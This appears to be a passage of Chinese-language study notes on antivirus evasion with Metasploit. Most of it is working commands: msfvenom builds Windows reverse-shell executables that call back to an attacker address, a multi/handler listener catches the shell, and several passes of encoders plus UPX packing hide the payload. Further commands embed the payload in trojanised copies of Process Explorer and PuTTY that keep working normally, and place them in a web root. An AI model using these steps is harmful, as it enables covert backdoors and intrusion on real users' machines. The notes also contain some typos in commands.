05_免杀

使用MSF攻击载荷生成器创建可独立运行的二进制文件

#创建一个简单的反弹shell程序，它能够回连到攻击机，并弹出一个命令行shell
#载入攻击载荷并用--payload-options选项查看可用参数
msfvenom -p windows/shell_reverse_tcp --payload-options

#再次执行msfvenom命令，输入所需参数，使用-f参数指定输出文件的格式
/home/scripts/payloads#    msfvenom -p windows/shell_reverse_tcp LHOST=192.168.118.128 LPORT=31337 -f exe -o payload1.exe

#查看文件类型
file payload1.exe

#使用multi/handler模块在MSF终端中启动一个监听器,载入了handler模块，设置攻击载荷#为Windows反弹shell，以匹配先前创建的可执行文件
msf > use exploit/multi/handler
msf > set PAYLOAD windows/shell_reverse_tcp
msf > show options
msf > set ....

　　躲避杀毒软件的检测

#使用MSF编码器
#msfvenom -l encoders列出所有可用的编码格式
msfvenom -l encoders

#使用-p指定使用的攻击载荷模块，使用-e指定使用编码器，-f指定输出格式，-o指定输出的文件名
/home/scripts#    msfvenom -p windows/shell_reverse_tcp LHOST=... LPORT=...
-e x86/shikata_ga_nai -f exe -o payload2.exe

#多重编码
#依次使用10次shikata_ga_nai编码，5次alpha_upper编码，10次shikata_ga_nai编码
10次countdown编码，最后生成可执行文件
/home/scripts#    msfvenom -p windwos/meterpreter/reverse_tcp LHOST=...
LPORT=... -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -e x86/alpha_upper
 -a x86 --platform windows -i 5 -f raw | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows
 -i 10 -f raw | msfvenom -e x86/countdown -a x86 --platform windows -i 10 -f exe -o payload3.exe

　　自定义可执行文件模板

通常情况下， 运行工msfvenom命令时，共攻击载荷被嵌入到默认的可执行文件模板中。虽然这个模板时常更新，但它永远是杀毒软件厂商的重点关注对象

#msfvenom支持使用-x 选项使用任意的Windows可执行程序来代替默认模板文件。
#重新对攻击载荷进行编码，并将微软的Process Explorer程序作为自定义的可执行程序模板
#下载Process Explorer软件，并将压缩包解压。使用-x标志指定下载的Process Explorer二
进制文件用作自定义模板。
/home/download#       wget http://.......zip
/home/download#        cd work
/home/download/work#    unzip ../ProcessExplorer.zip
/home/download/work#    cd..
/home/download/#    msfvenom -p windows/shell_reverse_tcp LHOST=... LPORT=8080 -e x86/shikata_gga_nai -x work/procexp.exe -i 5 -f exe -o /var/www/pe_backdoor.exe

#编码完成后，通过msfcli启动handler模块对入站的连接进行监听
msf > use multi/handler
msf > set PAYLOAD windows/shell/reverse_tcp
msf > set ...
msf > exploit

　　隐秘地启动一个攻击载荷

#可以在启动攻击载荷的同时，让宿主程序也正常运行起来
#下载了一个exe，然后用-k选项处理exe文件，-k选项会配置攻击载荷在一个独立的线程中启动柜，这样宿主程序在执行时不会受到影响
/home/download#    wget https://....exe
/home/download#    msfvenom -p windows/shell_reverse_tcp LHOST=... LPORT=8080 -e x86/shikata_ga_nai -x putty.exe -k -i 5 -f exe -o /var/www/pytty_backdoor.exe

　　加壳软件

加壳软件是一类能够对可执行文件进行加密压缩并将解压代码嵌入其中的工具。当加过壳的文件被执行后，解压代码会从已压缩的数据中重建原始程序并运行。

#使用UPX加壳软件对payload3.exe进行编码和压缩
/home/scripts/payloads#    upx
/home/scripts/payloads#    upx -5 payload3.exe